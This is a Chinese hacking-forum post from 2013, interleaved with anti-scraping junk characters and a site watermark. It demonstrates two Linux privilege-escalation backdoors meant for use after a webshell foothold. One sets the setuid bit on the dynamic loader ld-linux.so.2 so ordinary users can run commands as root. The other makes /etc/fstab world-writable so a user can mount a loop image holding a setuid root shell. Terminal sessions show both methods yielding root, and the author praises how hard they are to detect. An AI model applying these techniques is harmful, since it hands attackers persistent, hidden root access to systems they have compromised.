找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2992|回复: 1
打印 上一主题 下一主题

webshell下LINUX提权+留后门

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:56:25 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
方法一:setuid的方法,其实8是很隐蔽。看看过程:2ezX-BUG-关注前沿信息安全技术研究% \% K7 }" D$ ?" m( |

4 |$ {3 _! J# s# ?$ \" \9 S[root@localdomain lib]# ls -l |grep ld-linux2ezX-BUG-关注前沿信息安全技术研究
1 X7 |6 F- `7 u( b' h4 {, y8 ?# Plrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
  t) n3 k9 M  b3 i8 V( g/ ~lrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究. P' c+ j: s- H* q! h: I
[root@localdomain lib]# chmod +s ld-linux.so.22ezX-BUG-关注前沿信息安全技术研究% e) h" r" l$ x3 y
[root@localdomain lib]# ls -l |grep ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究" d: I& ]0 h+ z/ g# m
-rwsr-sr-x 1 root root 128952 2007-10-18 04:49 ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究6 @; p$ W& A8 b
lrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.so2ezX-BUG-关注前沿信息安全技术研究
, u4 C3 K) e- t8 w$ t; i! ^[root@localdomain lib]#2ezX-BUG-关注前沿信息安全技术研究
5 I/ W2 Y8 A: W我们这里给/lib/ld-linux.so.2这个文件(在FC8里,它指向ld-2.7.so这个文件)加了setuid属性。然后我们看怎么利用它。2ezX-BUG-关注前沿信息安全技术研究3 e3 [- m8 h. S6 u

0 B$ ?2 v8 \9 }4 b+ b9 i/ c( o普通用户登录,测试下权限:2ezX-BUG-关注前沿信息安全技术研究
" g: N2 J5 V' k% }# r) k9 l3 r6 e) j. z# O1 T2 ]3 e& N
[xiaoyu@localdomain ~]$ whoami2ezX-BUG-关注前沿信息安全技术研究1 J5 o' q7 g  Y7 }4 r8 Q6 L5 U
xiaoyu2ezX-BUG-关注前沿信息安全技术研究
: I; y5 s% Z( e[xiaoyu@localdomain ~]$ /lib/ld-linux.so.2 `which whoami`2ezX-BUG-关注前沿信息安全技术研究) M& i2 Q+ H  u& F1 H
root2ezX-BUG-关注前沿信息安全技术研究9 H' [6 x2 h: q7 L6 Z
[xiaoyu@localdomain ~]$2ezX-BUG-关注前沿信息安全技术研究6 }4 A2 p* w7 c- x
恩,嘿嘿 root了吧,具体怎么生成root shell,你们自己去想吧,凡事都不要点得太透,对吧。呵呵,可以肯定的一点,/lib/ld-linux.so.2 /bin/sh肯定生成不了rootshell, bash检查euid 和uid,看是否相等...OK,不多说了。2ezX-BUG-关注前沿信息安全技术研究
- w( _; c# h( y( G2 U. u" X2 \$ F  J% z" ?, j4 ^. ]
方法二:2ezX-BUG-关注前沿信息安全技术研究
6 v9 i2 z0 b3 j% [' u' r4 e% z9 }: ?& g
看过程:2ezX-BUG-关注前沿信息安全技术研究% C. u6 z& t  H/ k2 h9 O

" Y* s4 l; f  l1 Y( N2 j[root@localdomain etc]# chmod a+w /etc/fstab2ezX-BUG-关注前沿信息安全技术研究7 n5 `4 C4 i6 n5 J7 _" b8 Z: L( K5 Y
[root@localdomain etc]#2ezX-BUG-关注前沿信息安全技术研究2 x& @( g6 f- H. C. }
, ?/ g9 K1 r) M3 f2 K, j: w6 v0 _
这就留好了。此方法比较XXOXX,估计没几个管理员知道。利用方法演示下2ezX-BUG-关注前沿信息安全技术研究! ]% g- h( ^+ I) g! _$ c
9 ?% ^: k, S8 A2 [) ~
[xiaoyu@localdomain ~]$ ls -l /etc/fstab2ezX-BUG-关注前沿信息安全技术研究  [0 l- A0 t; c: U
-rw-rw-rw- 1 root root 456 2008-06-07 17:28 /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
; m: a! a  G7 F$ y) ?[xiaoyu@localdomain ~]$ echo 'test /mnt ext2 user,suid,exec,loop 0 0' >> /etc/fstab2ezX-BUG-关注前沿信息安全技术研究
5 E; C$ k( P1 R3 O# \( N$ d- i" t8 y1 r8 u
然后从本机把一个文件到目标机器上去,这里我们命名为test2ezX-BUG-关注前沿信息安全技术研究+ l0 i& i: [& U. P

6 X1 m$ m7 y8 G; e/ A2 g0 g[xiaoyu@localdomain tmp]$ ls -l test2ezX-BUG-关注前沿信息安全技术研究
( J' w, H* W/ M1 w  ?0 m-rw-rw-r-- 1 xiaoyu xiaoyu 102400 2008-04-20 02:51 test2ezX-BUG-关注前沿信息安全技术研究
1 Z1 X0 q- Q" H1 s2 m[xiaoyu@localdomain tmp]$ mount test2ezX-BUG-关注前沿信息安全技术研究1 A$ q' l. P% N
[xiaoyu@localdomain tmp]$ cd /mnt2ezX-BUG-关注前沿信息安全技术研究- x& L: O" A# ?
[xiaoyu@localdomain mnt]$ ls -l2ezX-BUG-关注前沿信息安全技术研究
' @% r+ y3 h0 ]' C9 k* {9 L: w$ Dtotal 182ezX-BUG-关注前沿信息安全技术研究
$ p4 M/ w5 S3 b8 B8 rdrwx------ 2 root root 12288 2008-04-20 05:44 lost+found2ezX-BUG-关注前沿信息安全技术研究
4 n. e, P2 _8 }7 O) X9 |-rwsr-sr-x 1 root root 4927 2008-04-20 05:44 root2ezX-BUG-关注前沿信息安全技术研究
$ T) ^9 P( M  y4 ?0 E2 T[xiaoyu@localdomain mnt]$ ./root2ezX-BUG-关注前沿信息安全技术研究5 d: K" K* W0 B- e
sh-3.2#2ezX-BUG-关注前沿信息安全技术研究
- L4 i7 ~- m" y$ p: ?看到了吧,从普通用户提升到root了。呵呵。2ezX-BUG-关注前沿信息安全技术研究
2 K4 V- T6 u! B* btest这个文件baidu貌似木有上传功能撒,木办法传2ezX-BUG-关注前沿信息安全技术研究
! U1 p. q' n5 O! c( j7 I  g3 b
貌似可能有人说本地后门木啥鸟用,但是你要搞清楚:一个webshell里面就可以完成这一切....2ezX-BUG-关注前沿信息安全技术研究
- [( d3 s6 B& U' i1 B* |: O* N2ezX-BUG-关注前沿信息安全技术研究
/ O+ j/ k* v9 F7 F* g) D
5 d; y1 K; o3 y! \6 p
回复

使用道具 举报

沙发
发表于 2013-3-13 15:10:29 | 只看该作者
谢谢分享
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表